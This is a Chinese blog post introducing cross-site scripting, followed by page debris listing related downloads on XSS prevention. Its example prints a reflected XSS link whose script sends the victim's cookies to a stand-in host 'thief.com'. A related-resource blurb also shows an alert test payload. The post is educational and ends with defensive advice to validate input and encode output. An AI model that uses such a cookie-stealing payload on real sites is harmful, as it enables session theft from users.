`
cuishen
  • 浏览: 296897 次
  • 性别: Icon_minigender_1
  • 来自: 上海
社区版块
存档分类
最新评论

XSS攻击一例

    博客分类:
  • j2ee
阅读更多
XSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的.  比如获取用户的Cookie,导航到恶意网站,携带木马等。

下面一个例子演示怎样进行XSS攻击:

Tom发现"Victim.com"网站有个XSS漏洞,而Jerry是"Victim.com"的用户,有一天他收到了QQ上的消息,让他点击下面的连接:
http://victim.com/signon.do?term=<script>window.open("http://thief.com?cookie="+document.cookie)</script>

Jerry认为"Victim.com"他经常访问,所以毫不犹豫的点击了连接,后果是Jerry在"Victim.com"的所有cookie信息被Tom窃取。

攻击的过程是三个步骤:
step 1. 诱骗受害人点击钓鱼连接,或者访问钓鱼网站。
step 2. XSS漏洞网站的server端没有对client input做校验,也没有对output做过滤和转码。
step 3. 返回的jsp里面有漏洞参数,上例是"term",当返回到client端后,问题脚本就被执行了。

所以防范XSS攻击也很简单:
A. 对于用户来说,千万小心钓鱼连接和钓鱼网站。
B. 对于我们的网站来说,在server端一定要对input做校验,对output转码!
0
0
分享到:
评论

相关推荐

    springmvc4配置防止XSS攻击的方法

    在Spring MVC中防止XSS攻击的基本方法之一是通过实现过滤器来包装HttpServletRequest对象。具体地,需要创建一个包装类XssHttpServletRequestWrapper,用于覆盖HttpServletRequest的方法,对所有进入的请求数据进行...

    Java防止xss攻击jar包

    总的来说,防止XSS攻击需要开发者对输入数据的全面控制,结合使用各种工具和策略,如在本例中的"xssProtect-0.1.jar"和可能的ANTLR解析功能,来确保应用程序的安全性。同时,开发者应该遵循安全编码的最佳实践,并...

    xss跨站脚本攻击

    XSS攻击是一种非常危险的安全威胁,它不仅能够窃取用户的个人信息,还可能对企业的数据安全造成重大损失。因此,了解XSS攻击的原理及其防御措施对于保障网络环境的安全至关重要。通过采取适当的防范措施,可以大大...

    XSS 跨站脚本攻击及防范

    **Yamanner蠕虫**:这是一个著名的XSS攻击案例,它利用了Yahoo Mail系统的一个漏洞,当用户在Web上查看邮件时,邮件内容中的JavaScript代码能够被执行。攻击者通过构造带有恶意脚本的邮件,一旦受害者打开这些邮件,...

    Input XSS最新漏洞及利用

    XSS攻击的主要目的是窃取用户敏感信息,如cookie,或者对用户进行钓鱼攻击。 在描述中提到的三种Input XSS漏洞检测字符串是:“”、“”和 “&lt;script&gt;alert(/xss/)”。首先,“”是最基本的HTML标签检测,如果在源...

    XSS_跨站代码大全

    #### 一、XSS攻击概述 XSS(Cross Site Scripting),即跨站脚本攻击,是一种常见的Web安全漏洞。它允许攻击者将恶意脚本注入到看似可信的网站上。这些脚本会在用户的浏览器中执行,可能窃取用户的数据或对用户进行...

    xss平台源码

    XSS攻击是网络安全中常见的一种类型,它发生在恶意脚本被注入到由一个可信的Web应用服务的网页中,然后在用户的浏览器上执行时。这些脚本可以用来窃取用户的会话信息、执行恶意操作或进行其他攻击。 标题中的“xss...

    Laravel5中防止XSS跨站攻击的方法

    在Web开发中,跨站脚本攻击(XSS攻击)是一种常见的安全威胁,攻击者通过注入恶意脚本代码到网页中,以达到窃取信息、破坏网站功能等目的。Laravel作为PHP的一种框架,为了增强安全性,在其5.0版本中提供了集成扩展...

    开发代码安全规范防SQL注入和XSS跨站攻击代码编写规范样本.doc

    一、SQL注入攻击防范 1.1 什么是SQL注入攻击? SQL注入攻击是指攻击者将恶意的SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串中,以欺骗服务器执行恶意的SQL命令。 1.2 经典案例说明: 例1:用户...

    提供xss的dll文件下载

    在本例中,这个DLL文件可能包含了微软开发的特定功能,用于帮助开发者或系统管理员防范XSS攻击。 XSS攻击是一种常见的网络安全威胁,攻击者通过注入恶意脚本到网页中,当用户访问这些被篡改的页面时,恶意脚本会在...

    第十节 绕过过滤domain为空的XSS-01

    本节主要探讨了如何绕过特定过滤机制,即针对domain为空的情况进行XSS攻击。 **1. XSS漏洞发现** XSS漏洞通常出现在网站未能正确地验证和转义用户输入的地方。通过构造特殊的无害字符串,攻击者可以尝试在网页的...

    XSS漏洞挖掘及利用教程

    2. **过滤策略**:防止XSS攻击的方法包括在输入时过滤特殊字符,例如`和`&gt;`,以及在输出时对用户数据进行编码或转义,避免它们被解释为HTML或JavaScript代码。 **二、无过滤XSS示例** 1. **实例分析**:以一个简单...

    跨站脚本攻击实例解析汇编.pdf

    总结来说,XSS攻击是一种严重威胁用户数据安全的攻击手段,通过注入恶意脚本,攻击者可以窃取敏感信息、操纵用户行为。理解和防范这种攻击至关重要,尤其是对于Web开发人员,他们需要采取有效措施来确保应用程序的...

    mySecurityBook

    以Java语言为例,防御XSS攻击的第一步是确定使用哪个开源组件。根据业务需求的不同,选择合适的开源组件至关重要。对于简单的文本参数过滤,HTML Sanitizer或Java Encoder可以作为首选。如果应用中包含复杂文本处理...

    LoadTheDisplayBarDynamically.rar

    在本例中,我们关注的是动态显示,这意味着我们需要控制ProgressBar的更新,使其看起来像在实时加载数据或执行操作。 要实现动态加载效果,我们首先需要在设计界面中添加一个ProgressBar控件和一个Button控件。在VS...

    PHP编程一百例

    15. **安全防护**:防止SQL注入、XSS攻击,了解CSRF防范,以及如何实现安全的密码存储。 16. **性能优化**:内存管理,代码优化技巧,以及如何使用PHP内置的性能分析工具。 17. **PHP与命令行**:使用PHP编写...

    ASP源码—Ajax网页交互动态添加删除数据一例.zip

    这个"ASP源码—Ajax网页交互动态添加删除数据一例.zip"压缩包文件显然是一个示例项目,展示了如何在ASP环境中利用Ajax技术实现网页上的数据动态添加和删除功能。Ajax(Asynchronous JavaScript and XML)是一种在...

    【精品】云鼎实验室-Web漏洞与企业安全实例讲解77页.pptx

    XSS攻击有多种类型,如存储型XSS、反射型XSS和DOM型XSS。攻击者可以构造看似无害的URL,诱导用户点击,从而触发XSS。例如,`点击抽奖&lt;/a&gt;`,在URL中添加恶意参数,当用户点击时,链接会执行恶意脚本。此外,URL中的`...

    php编程开发一百例

    12. **安全防护**:如防止SQL注入、XSS攻击,以及如何使用预处理语句和参数绑定等。 13. **PHP与Web服务**:了解RESTful API的构建,使用PHP提供或消费Web服务。 通过这些实例,你可以一步步地学习和实践PHP编程,...

Global site tag (gtag.js) - Google Analytics